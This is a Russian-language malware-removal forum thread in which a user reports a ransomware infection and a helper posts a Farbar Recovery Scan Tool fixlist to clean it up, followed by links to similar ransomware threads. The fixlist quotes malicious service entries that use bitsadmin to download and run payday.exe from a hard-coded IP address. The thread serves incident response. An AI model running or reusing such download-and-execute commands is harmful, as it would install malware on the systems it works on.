Перейти к содержанию
Важная информация для бета-тестеров

шифровальщик starbax@tutanota.de

bartleby
 Share

Рекомендуемые сообщения

bartleby Новичок

bartleby

Опубликовано
Опубликовано (изменено)

Добрый день

Поймали шифровальщика

Шифрование началось ночью примерно в 3 часа и к утру большая часть файлов была зашифрована

Примеры зашифрованных файлов, файлов readme.txt и логи прилагаю

Спасибо

FRST.txt

Addition.txt

Shortcut.txt

files.zip

README.zip

CollectionLog-2018.06.20-13.07.zip

Изменено пользователем bartleby
Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

Печально. Это похоже и есть шифратор. Его нет даже на исходном сервере.

 

Пробуйте с помощью программ восстановления данных, которые нужно установить на несистемный диск, поискать файл среди удаленных.

 

Такой файл C:\Users\Администратор\AppData\Local\Temp\{3BD59D8C-6E70-4C17-ACB8-F8B333A1F93E}.cmd тоже отсутствует?

 

+ 1. Откройте Блокнот и скопируйте в него приведенный ниже текст

CreateRestorePoint:
HKLM-x32\...\RunOnce: [{3BD59D8C-6E70-4C17-ACB8-F8B333A1F93E}] => cmd.exe /C start /D "C:\Users\A5A32~1.PEK\AppData\Local\Temp" /B {3BD59D8C-6E70-4C17-ACB8-F8B333A1F93E}.cmd
Handler: ms-help - {314111c7-a502-11d2-bbca-00c04f8ec294} -  No File
S2 BvWn; cmd /c bitsadmin /transfer wcb /priority high http://81.177.140.58/payday.exe C:\payday.exe && C:\payday.exe
S2 eINJ; cmd /c bitsadmin /transfer wcb /priority high http://81.177.140.58/payday.exe C:\payday.exe && C:\payday.exe <==== ATTENTION
S2 WbZa; cmd /c bitsadmin /transfer wcb /priority high http://81.177.140.58/payday.exe C:\payday.exe && C:\payday.exe
S2 Googler; C:\Windows\System32\nssm.exe [121344 2017-11-15] () [File not signed]
C:\Windows\System32\nssm.exe
2. Нажмите ФайлСохранить как

3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool

4. Укажите Тип файлаВсе файлы (*.*)

5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить

6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: перезагрузку компьютера нужно выполнить вручную.
Ссылка на комментарий
Поделиться на другие сайты
bartleby Новичок

bartleby

Опубликовано
  • Автор
Опубликовано

Такой файл C:\Users\Администратор\AppData\Local\Temp\{3BD59D8C-6E70-4C17-ACB8-F8B333A1F93E}.cmd тоже отсутствует?

 

Конкретно такого нету.. есть папка похожего вида но другое имя и пустая.

 

 

 

 

Ссылка на комментарий
Поделиться на другие сайты
bartleby Новичок

bartleby

Опубликовано
  • Автор
Опубликовано

Система была проверена KVRT лог приложить не дает

На скрине то что он нашел


Пробуйте выполнять поиск payday.exe и 7061796461992E657865 среди удаленных

 

А потом фикс в Farbar

 

Сканирую систему по результату отпишусь

post-50192-0-90071000-1529491043_thumb.jpg

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • Thunderer
      Шифровальщик
      От Thunderer
      Зашифровали файлы на компьютере и все общие папки 
      Подключились к компьютеру по RDP 
      В архиве логи frst, зашифрованный и расшифрованный файлы
      -Файлы.zip
    • Пользователь 1551
      Шифровальщик
      От Пользователь 1551
      Добрый день! У нас аналогичная ситуация? Удалось расшифровать?
       
      Сообщение от модератора Mark D. Pearlstone Перемещено из темы.
    • Korwin312
      Шифровальщик ooo4ps.
      От Korwin312
      Добрый день.
      Зашифрованы файлы на диске C. Полностью заблокирован диск D.
      Атака совершена 22.02 около полуночи.
      Файлы прилагаю.
       
      FRST.txt Addition.txt Shortcut.txt FILES_ENCRYPTED.txt logo_TF_2016_222px (1).png.rar
    • Евгений А1
      Шифровальщик АES.
      От Евгений А1
      Добрый день! Поймали шифровальщик. Очень похоже на взлом сервера, зашифрованы не только папки которые были видны через сеть, но и папки внутри сервера. Которые не были расшарены. Во вложении файлы про выкуп. Реадми. И примеры зашифрованных файлов.
      vikupandfile.7zAddition.txtFRST.txt
    • Bruce007
      Шифровальщик с расширением fear.pw
      От Bruce007
      Здравствуйте!
      Поймали вирус-шифровальщик с расширением fear.pw прикладываю два зашифрованных файла и лог FRST (запускал с live cd) почта platishilidrochish@fear.pw
      Пожалуйста, помогите, чем можете!
      DeCrYpTiOn.txt FRST.txt Примеры файлов.rar
×
×
  • Создать...